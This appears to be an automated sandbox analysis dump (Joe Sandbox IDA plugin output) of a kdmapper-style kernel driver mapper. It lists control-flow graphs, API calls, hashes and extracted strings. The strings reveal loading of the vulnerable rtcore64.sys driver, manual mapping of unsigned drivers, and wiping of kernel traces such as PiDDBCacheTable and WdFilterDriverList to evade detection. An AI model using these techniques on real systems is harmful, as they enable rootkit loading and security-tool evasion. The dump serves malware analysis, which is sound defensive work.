7288 7ff7738e9ade 7287->7288 7289 7ff7738f0b10 7288->7289 7298 7ff7738f02a0 7289->7298 7291 7ff7738f0b38 7291->7291 7316 7ff7738f0c40 7291->7316 7294 7ff7738f0c18 _CxxThrowException 7294->5776 7294->5777 7295 7ff7738f0c13 7297 7ff7738f3fe0 free 7295->7297 7296 7ff7738f0c0c _invalid_parameter_noinfo_noreturn 7296->7295 7297->7294 7299 7ff7738e9af0 22 API calls 7298->7299 7300 7ff7738f02e0 7299->7300 7301 7ff7738f030a 7300->7301 7302 7ff7738ea0f0 11 API calls 7300->7302 7357 7ff7738f2230 7301->7357 7302->7301 7304 7ff7738f0336 7305 7ff7738f0377 __std_exception_copy 7304->7305 7308 7ff7738f0372 7304->7308 7311 7ff7738f036b _invalid_parameter_noinfo_noreturn 7304->7311 7306 7ff7738f0404 7305->7306 7307 7ff7738f0439 7305->7307 7309 7ff7738f0434 7306->7309 7313 7ff7738f042d _invalid_parameter_noinfo_noreturn 7306->7313 7310 7ff7738f3fc0 8 API calls 7307->7310 7312 7ff7738f3fe0 free 7308->7312 7314 7ff7738f3fe0 free 7309->7314 7315 7ff7738f045a 7310->7315 7311->7308 7312->7305 7313->7309 7314->7307 7315->7291 7317 7ff7738f3948 __std_fs_code_page 2 API calls 7316->7317 7318 7ff7738f0ca4 7317->7318 7364 7ff7738f2430 7318->7364 7321 7ff7738f2430 28 API calls 7322 7ff7738f0d0c 7321->7322 7325 7ff7738f0d42 7322->7325 7327 7ff7738f0d56 7322->7327 7329 7ff7738f0d50 7322->7329 7324 7ff7738f0dbb 7328 7ff7738f2590 11 API calls 7324->7328 7382 7ff7738f2620 7325->7382 7327->7329 7330 7ff7738f0d62 memmove 7327->7330 7331 7ff7738f0dda 7328->7331 7402 7ff7738f2590 7329->7402 7332 7ff7738f0d84 7330->7332 7333 7ff7738f0d9d 7330->7333 7334 7ff7738f2230 11 API calls 7331->7334 7332->7333 7336 7ff7738f0e5f _invalid_parameter_noinfo_noreturn 7332->7336 7337 7ff7738f3fe0 free 7333->7337 7335 7ff7738f0de6 7334->7335 7338 7ff7738f0e76 7335->7338 7340 7ff7738f2590 11 API calls 7335->7340 7339 7ff7738f0e66 7336->7339 7337->7329 7348 7ff7738f0e83 7338->7348 7408 7ff7738ecc00 7338->7408 7341 7ff7738ecea0 10 API calls 7339->7341 7342 7ff7738f0e0c 7340->7342 7341->7338 7342->7339 7344 7ff7738f0e31 memmove 7342->7344 7344->7338 7345 7ff7738f0ee9 7349 7ff7738f0f37 7345->7349 7352 7ff7738f0f32 7345->7352 7354 7ff7738f0f2b _invalid_parameter_noinfo_noreturn 7345->7354 7347 7ff7738f0ee4 7351 7ff7738f3fe0 free 7347->7351 7348->7345 7348->7347 7350 7ff7738f0edd _invalid_parameter_noinfo_noreturn 7348->7350 7353 7ff7738f3fc0 8 API calls 7349->7353 7350->7347 7351->7345 7355 7ff7738f3fe0 free 7352->7355 7356 7ff7738f0bd2 7353->7356 7354->7352 7355->7349 7356->7294 7356->7295 7356->7296 7358 7ff7738f224d 7357->7358 7359 7ff7738f2263 memmove 7358->7359 7360 7ff7738f22a8 7358->7360 7359->7304 7362 7ff7738ecea0 10 API calls 7360->7362 7363 7ff7738f22bb 7362->7363 7363->7304 7365 7ff7738f2480 7364->7365 7366 7ff7738f0cd9 7364->7366 7381 7ff7738f2571 7365->7381 7428 7ff7738f3a94 WideCharToMultiByte 7365->7428 7366->7321 7368 7ff7738f05b0 13 API calls 7370 7ff7738f2577 7368->7370 7371 7ff7738f0880 12 API calls 7370->7371 7374 7ff7738f2583 7371->7374 7372 7ff7738f2513 7376 7ff7738f2770 10 API calls 7372->7376 7373 7ff7738f24ec memset 7377 7ff7738f24c0 7373->7377 7376->7377 7378 7ff7738f3a94 4 API calls 7377->7378 7379 7ff7738f2540 7378->7379 7379->7366 7380 7ff7738f0880 12 API calls 7379->7380 7380->7381 7381->7368 7383 7ff7738f275c 7382->7383 7384 7ff7738f2649 7382->7384 7434 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 7383->7434 7388 7ff7738f2697 7384->7388 7390 7ff7738f26cc 7384->7390 7392 7ff7738f26a4 7384->7392 7386 7ff7738f2761 7391 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 7386->7391 7387 7ff7738f4108 std::_Facet_Register 3 API calls 7389 7ff7738f26b9 7387->7389 7388->7386 7388->7392 7393 7ff7738f272f _invalid_parameter_noinfo_noreturn 7389->7393 7396 7ff7738f2736 memmove 7389->7396 7397 7ff7738f26f5 memmove 7389->7397 7390->7389 7394 7ff7738f4108 std::_Facet_Register 3 API calls 7390->7394 7395 7ff7738f2767 7391->7395 7392->7387 7393->7396 7394->7389 7398 7ff7738f272d 7396->7398 7399 7ff7738f2722 7397->7399 7400 7ff7738f270d 7397->7400 7398->7329 7401 7ff7738f3fe0 free 7399->7401 7400->7393 7400->7399 7401->7398 7403 7ff7738f25b5 memmove 7402->7403 7404 7ff7738f25f7 7402->7404 7403->7324 7406 7ff7738ecea0 10 API calls 7404->7406 7407 7ff7738f260c 7406->7407 7407->7324 7409 7ff7738ecd54 7408->7409 7410 7ff7738ecc2f 7408->7410 7435 7ff7738e1230 ?_Xlength_error@std@@YAXPEBD 7409->7435 7413 7ff7738ecc7d 7410->7413 7415 7ff7738ecc8a 7410->7415 7417 7ff7738eccb2 7410->7417 7412 7ff7738ecd59 7418 7ff7738e1190 Concurrency::cancel_current_task __std_exception_copy 7412->7418 7413->7412 7413->7415 7414 7ff7738f4108 std::_Facet_Register 3 API calls 7416 7ff7738ecc9f 7414->7416 7415->7414 7419 7ff7738ecd1d _invalid_parameter_noinfo_noreturn 7416->7419 7422 7ff7738ecd24 memmove 7416->7422 7423 7ff7738eccda memmove 7416->7423 7417->7416 7420 7ff7738f4108 std::_Facet_Register 3 API calls 7417->7420 7421 7ff7738ecd5f 7418->7421 7419->7422 7420->7416 7424 7ff7738ecd1b 7422->7424 7425 7ff7738ecd10 7423->7425 7426 7ff7738eccfb 7423->7426 7424->7348 7427 7ff7738f3fe0 free 7425->7427 7426->7419 7426->7425 7427->7424 7429 7ff7738f3af3 7428->7429 7430 7ff7738f3aeb GetLastError 7428->7430 7431 7ff7738f24a5 7429->7431 7432 7ff7738f3b00 WideCharToMultiByte 7429->7432 7430->7429 7431->7370 7431->7372 7431->7373 7431->7377 7432->7431 7433 7ff7738f3b2e GetLastError 7432->7433 7433->7431 5211 7ff7738e8f90 5212 7ff7738e8fb2 5211->5212 5213 7ff7738e8fa7 5211->5213 5214 7ff7738e8fb9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 5212->5214 5215 7ff7738e8fc8 5212->5215 5214->5215 5216 7ff7738e8fed memmove 5215->5216 5218 7ff7738e9022 5215->5218 5216->5218 5217 7ff7738e90be 5218->5217 5219 7ff7738e909e 5218->5219 5221 7ff7738e9070 fread 5218->5221 5219->5217 5220 7ff7738e90a3 fread 5219->5220 5220->5217 5221->5217 5221->5218

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ff7738e45e0-7ff7738e466d LoadLibraryA * 2 _dupenv_s 1 7ff7738e4670-7ff7738e4677 0->1 1->1 2 7ff7738e4679-7ff7738e46c2 call 7ff7738ec9f0 call 7ff7738ea0f0 1->2 7 7ff7738e46c4-7ff7738e46d6 2->7 8 7ff7738e46f9-7ff7738e478e free call 7ff7738ec9f0 call 7ff7738e9af0 call 7ff7738e3bb0 call 7ff7738e3ce0 2->8 10 7ff7738e46f4 call 7ff7738f3fe0 7->10 11 7ff7738e46d8-7ff7738e46eb 7->11 21 7ff7738e4790-7ff7738e4797 8->21 22 7ff7738e479c-7ff7738e4826 call 7ff7738ec9f0 SymFromName 8->22 10->8 11->10 13 7ff7738e46ed-7ff7738e46f3 _invalid_parameter_noinfo_noreturn 11->13 13->10 23 7ff7738e48b1-7ff7738e48cd call 7ff7738ea3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 21->23 28 7ff7738e485e-7ff7738e486e 22->28 29 7ff7738e4828-7ff7738e482c 22->29 32 7ff7738e4ed2-7ff7738e4ed6 23->32 30 7ff7738e48a5-7ff7738e48a8 28->30 31 7ff7738e4870-7ff7738e4882 28->31 33 7ff7738e482e-7ff7738e4840 29->33 34 7ff7738e48aa 29->34 30->34 39 7ff7738e48d2-7ff7738e4951 _time64 GetCurrentThreadId srand rand 30->39 37 7ff7738e4884-7ff7738e4897 31->37 38 7ff7738e48a0 call 7ff7738f3fe0 31->38 35 7ff7738e4f05-7ff7738e4f0d 32->35 36 7ff7738e4ed8-7ff7738e4eff SymUnloadModule64 SymCleanup CloseHandle * 2 32->36 40 7ff7738e4842-7ff7738e4855 33->40 41 7ff7738e4857-7ff7738e485c call 7ff7738f3fe0 33->41 34->23 43 7ff7738e4f0f-7ff7738e4f20 35->43 44 7ff7738e4f3c-7ff7738e4f54 35->44 36->35 37->38 45 7ff7738e4899-7ff7738e489f _invalid_parameter_noinfo_noreturn 37->45 38->30 47 7ff7738e4953-7ff7738e495d 39->47 48 7ff7738e499d-7ff7738e49c7 call 7ff7738ea3c0 call 7ff7738e40c0 39->48 40->41 40->45 41->34 51 7ff7738e4f22-7ff7738e4f35 43->51 52 7ff7738e4f37 call 7ff7738f3fe0 43->52 53 7ff7738e4f56-7ff7738e4f67 44->53 54 7ff7738e4f8a-7ff7738e4fa3 44->54 45->38 55 7ff7738e4967-7ff7738e4998 rand 47->55 73 7ff7738e49cc-7ff7738e49f1 call 7ff7738ed590 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 48->73 74 7ff7738e49c9 48->74 51->52 58 7ff7738e4f7e-7ff7738e4f84 _invalid_parameter_noinfo_noreturn 51->58 52->44 60 7ff7738e4f85 call 7ff7738f3fe0 53->60 61 7ff7738e4f69-7ff7738e4f7c 53->61 62 7ff7738e4fa5-7ff7738e4fb6 54->62 63 7ff7738e4fd9-7ff7738e500b call 7ff7738f3fc0 54->63 55->55 56 7ff7738e499a 55->56 56->48 58->60 60->54 61->58 61->60 64 7ff7738e4fd4 call 7ff7738f3fe0 62->64 65 7ff7738e4fb8-7ff7738e4fcb 62->65 64->63 65->64 69 7ff7738e4fcd-7ff7738e4fd3 _invalid_parameter_noinfo_noreturn 65->69 69->64 77 7ff7738e49f3-7ff7738e4a0a 73->77 78 7ff7738e4a2d-7ff7738e4a3c call 7ff7738e42e0 73->78 74->73 80 7ff7738e4a0c-7ff7738e4a1f 77->80 81 7ff7738e4a28 call 7ff7738f3fe0 77->81 85 7ff7738e4a66-7ff7738e4adc _wremove memset call 7ff7738e89c0 ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z ??7ios_base@std@@QEBA_NXZ 78->85 86 7ff7738e4a3e 78->86 80->81 83 7ff7738e4a21-7ff7738e4a27 _invalid_parameter_noinfo_noreturn 80->83 81->78 83->81 92 7ff7738e4b23-7ff7738e4b2b call 7ff7738e9ef0 85->92 93 7ff7738e4ade-7ff7738e4ae6 call 7ff7738e9ef0 85->93 87 7ff7738e4a45-7ff7738e4a61 call 7ff7738ea3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 86->87 95 7ff7738e4e7e-7ff7738e4e86 87->95 101 7ff7738e4b50-7ff7738e4b67 call 7ff7738e4000 call 7ff7738f2900 92->101 102 7ff7738e4b2d-7ff7738e4b4f ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z 92->102 105 7ff7738e4b0b-7ff7738e4b1e call 7ff7738e4000 93->105 106 7ff7738e4ae8-7ff7738e4b0a ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z 93->106 98 7ff7738e4ec1-7ff7738e4ecd 95->98 99 7ff7738e4e88-7ff7738e4e9e 95->99 98->32 103 7ff7738e4ea0-7ff7738e4eb3 99->103 104 7ff7738e4ebc call 7ff7738f3fe0 99->104 115 7ff7738e4ba5-7ff7738e4bdd CreateFileW 101->115 116 7ff7738e4b69-7ff7738e4ba0 call 7ff7738ea3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z _wremove 101->116 102->101 103->104 108 7ff7738e4eb5-7ff7738e4ebb _invalid_parameter_noinfo_noreturn 103->108 104->98 105->87 106->105 108->104 118 7ff7738e4bdf-7ff7738e4be6 115->118 119 7ff7738e4beb-7ff7738e4c2e call 7ff7738ec9f0 call 7ff7738f32c0 115->119 116->95 121 7ff7738e4e59-7ff7738e4e60 call 7ff7738ea3c0 118->121 129 7ff7738e4c30-7ff7738e4c42 119->129 130 7ff7738e4c6c-7ff7738e4c6f 119->130 126 7ff7738e4e65-7ff7738e4e6f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 121->126 128 7ff7738e4e75-7ff7738e4e7d call 7ff7738e5a80 126->128 128->95 132 7ff7738e4c44-7ff7738e4c57 129->132 133 7ff7738e4c60-7ff7738e4c65 call 7ff7738f3fe0 129->133 135 7ff7738e4c71-7ff7738e4c78 130->135 136 7ff7738e4c7d-7ff7738e4cbc call 7ff7738ec9f0 call 7ff7738f32c0 130->136 132->133 137 7ff7738e4c59-7ff7738e4c5f _invalid_parameter_noinfo_noreturn 132->137 133->130 135->121 144 7ff7738e4cf3-7ff7738e4cf6 136->144 145 7ff7738e4cbe-7ff7738e4cd0 136->145 137->133 148 7ff7738e4d10-7ff7738e4d3a call 7ff7738e7b00 144->148 149 7ff7738e4cf8-7ff7738e4d0b call 7ff7738ea7c0 144->149 146 7ff7738e4cd2-7ff7738e4ce5 145->146 147 7ff7738e4cee call 7ff7738f3fe0 145->147 146->147 150 7ff7738e4ce7-7ff7738e4ced _invalid_parameter_noinfo_noreturn 146->150 147->144 156 7ff7738e4d40-7ff7738e4d55 148->156 157 7ff7738e4e52 148->157 149->128 150->147 158 7ff7738e4d60-7ff7738e4dc3 DeviceIoControl 156->158 157->121 158->157 159 7ff7738e4dc9-7ff7738e4dd6 158->159 159->158 160 7ff7738e4dd8-7ff7738e4ded 159->160 161 7ff7738e4def-7ff7738e4df6 call 7ff7738e72b0 160->161 162 7ff7738e4e4d-7ff7738e4e50 160->162 165 7ff7738e4e01-7ff7738e4e0b call 7ff7738e7ea0 161->165 166 7ff7738e4df8-7ff7738e4dff 161->166 162->95 169 7ff7738e4e16-7ff7738e4e24 call 7ff7738e6810 165->169 170 7ff7738e4e0d-7ff7738e4e14 165->170 166->121 173 7ff7738e4e26-7ff7738e4e2d 169->173 174 7ff7738e4e2f-7ff7738e4e36 call 7ff7738e5010 169->174 170->121 173->121 174->162 177 7ff7738e4e38-7ff7738e4e4b call 7ff7738ea7c0 174->177 177->126
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$D@std@@@std@@U?$char_traits@_invalid_parameter_noinfo_noreturn$??6?$basic_ostream@V01@@$Virtual$?setstate@?$basic_ios@CloseFreeHandleInformationLibraryLoadQuerySystem_wremovememmoverand$??7ios_base@std@@?write@?$basic_ostream@AllocCleanupControlCreateCurrentDeviceFileFromModule64NameThreadUnloadV12@_dupenv_s_time64freememsetsrand
                                                    • String ID: 0$NtUserSetGestureConfig$[!] Failed to ClearMmUnloadedDrivers$[!] Failed to ClearWdFilterDriverList$[-] Can't find TEMP folder$[-] Failed to ClearKernelHashBucketList$[-] Failed to ClearPiDDBCacheTable$[-] Failed to Load PDB$[-] Failed to Load Symbol of NtUserSetGestureConfig$[-] Failed to create vulnerable driver file$[-] Failed to get ntoskrnl.exe$[-] Failed to get temp path$[-] Failed to load driver rtcore64.sys$[-] Failed to register and start service for the vulnerable driver$[-] NtUserSetGestureConfig not found$[-] win32k.sys not found$[<] Loading vulnerable driver, Name: $\System32\win32k.sys$\\.\RTCore64$gfff$https://msdl.microsoft.com/download/symbols$ntoskrnl.exe$systemroot$user32.dll$win32k.sys$win32u.dll$xxx
                                                    • API String ID: 4261666574-1894779687
                                                    • Opcode ID: ca6c965419c697828ed41572e57baeb57fc7272cee40bc2890196779c665f0ad
                                                    • Instruction ID: 3b58e9c53199dc5aaacbff21408e2b17cca257f27fe9620bad41c8aa17bf58a3
                                                    • Opcode Fuzzy Hash: ca6c965419c697828ed41572e57baeb57fc7272cee40bc2890196779c665f0ad
                                                    • Instruction Fuzzy Hash: 5352A263E38A9385EA80EB24E8402BDE361FB95798F805331D95D27695DF7EE194C330
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7738F1673
                                                    • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F16CB
                                                    • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F170B
                                                    • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F179B
                                                    • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F17DB
                                                    • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F184B
                                                    • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F188B
                                                    • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F190B
                                                    • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F194B
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F19A4
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F19CC
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F19F3
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F1A1B
                                                      • Part of subcall function 00007FF7738F1390: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F1406
                                                      • Part of subcall function 00007FF7738F1390: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7738F143D
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F1A42
                                                    • memcmp.VCRUNTIME140(?), ref: 00007FF7738F1C18
                                                    • __std_fs_code_page.MSVCPRT ref: 00007FF7738F1BCC
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                      • Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                      • Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                      • Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                      • Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F1D58
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F1D7B
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7738F1DB3
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7738F1DBA
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7738F1DC1
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF7738F1F17
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F1F7A
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F20A0
                                                      • Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F2168
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?), ref: 00007FF7738F2190
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F21C4
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F220B
                                                      • Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122
                                                      • Part of subcall function 00007FF7738F3080: memset.VCRUNTIME140 ref: 00007FF7738F30C1
                                                      • Part of subcall function 00007FF7738F3080: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738F30E0
                                                      • Part of subcall function 00007FF7738F3080: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738F30FF
                                                      • Part of subcall function 00007FF7738F3080: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738F3133
                                                      • Part of subcall function 00007FF7738F3080: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738F3152
                                                      • Part of subcall function 00007FF7738F3080: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738F319B
                                                      • Part of subcall function 00007FF7738F3080: ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738F31D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@@$_wcsicmp$_invalid_parameter_noinfo_noreturn$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?setstate@?$basic_ios@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??7ios_base@std@@?flush@?$basic_ostream@_?sputc@?$basic_streambuf@_?uncaught_exception@std@@D@std@@@1@_ExceptionFilterInit@?$basic_streambuf@Osfx@?$basic_ostream@_UnhandledV12@V?$basic_streambuf@__std_fs_code_pagemallocmemcmpmemset
                                                    • String ID: [!] Incorrect Usage!$ doesn't exist$.sys$PassAllocationPtr$[+] Allocate Independent Pages mode enabled$[+] Clean Valnerable Driver enabled$[+] Free pool memory after usage enabled$[+] Mdl memory usage enabled$[+] Pass Allocation Ptr as first param enabled$[+] Usage: kdmapper.exe [--free][--mdl][--PassAllocationPtr] driver$[+] success$[-] Failed to map $[-] Failed to read image to memory$[-] File $[-] Too many allocation modes$[-] Warning failed to fully unload vulnerable driver $clean$free$indPages$mdl
                                                    • API String ID: 3202131322-1332891958
                                                    • Opcode ID: 57115e94d897f045736351ab5dfeee10681e615e4ee8e5fd71a3cef0e523c836
                                                    • Instruction ID: 677ada9eb5ad60f2a7e5eebe469812377ebdd1c1cec8fbbb34665fa65a8983ce
                                                    • Opcode Fuzzy Hash: 57115e94d897f045736351ab5dfeee10681e615e4ee8e5fd71a3cef0e523c836
                                                    • Instruction Fuzzy Hash: 13728263E3864381EB90AB25D8402B8E361EF65BA4FC04731D96D676D4DF7EE4A48330

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleModuleProcess$AttributesCleanupCurrentDirectoryErrorInitializeLastLoadNameOpenOptionsPathRemoveSpec_invalid_parameter_noinfo_noreturnmemmovememset
                                                    • String ID: %02x$.pdb$<$RSDS$d$symbols\
                                                    • API String ID: 3470403176-2640848996
                                                    • Opcode ID: 19db020fe7763a6a3d0e2d82ee103968594db8465301a545da02ff4b96a429cc
                                                    • Instruction ID: 755326c934ad90a9c6ea97edb301d254521ca56d9ce901c88a70186a8f705807
                                                    • Opcode Fuzzy Hash: 19db020fe7763a6a3d0e2d82ee103968594db8465301a545da02ff4b96a429cc
                                                    • Instruction Fuzzy Hash: C351A87366CB8282EBA0DB11F41436AF7A0FB98790F804235D69D63A94DF7ED494C720

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32memset
                                                    • String ID:
                                                    • API String ID: 2672634495-0
                                                    • Opcode ID: 02cd4b5768b70284ca7aaefdfa948c9715f4c916770f4bda0e9fa637a8fe1042
                                                    • Instruction ID: b7906496feca6a6adb8bed556e666472aa585adca3a6a760724df32b49a38eed
                                                    • Opcode Fuzzy Hash: 02cd4b5768b70284ca7aaefdfa948c9715f4c916770f4bda0e9fa637a8fe1042
                                                    • Instruction Fuzzy Hash: 8A114222638A4282EA90EB25E444569E360FB98BA0F944335E96E637D4DF3DD415C720

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
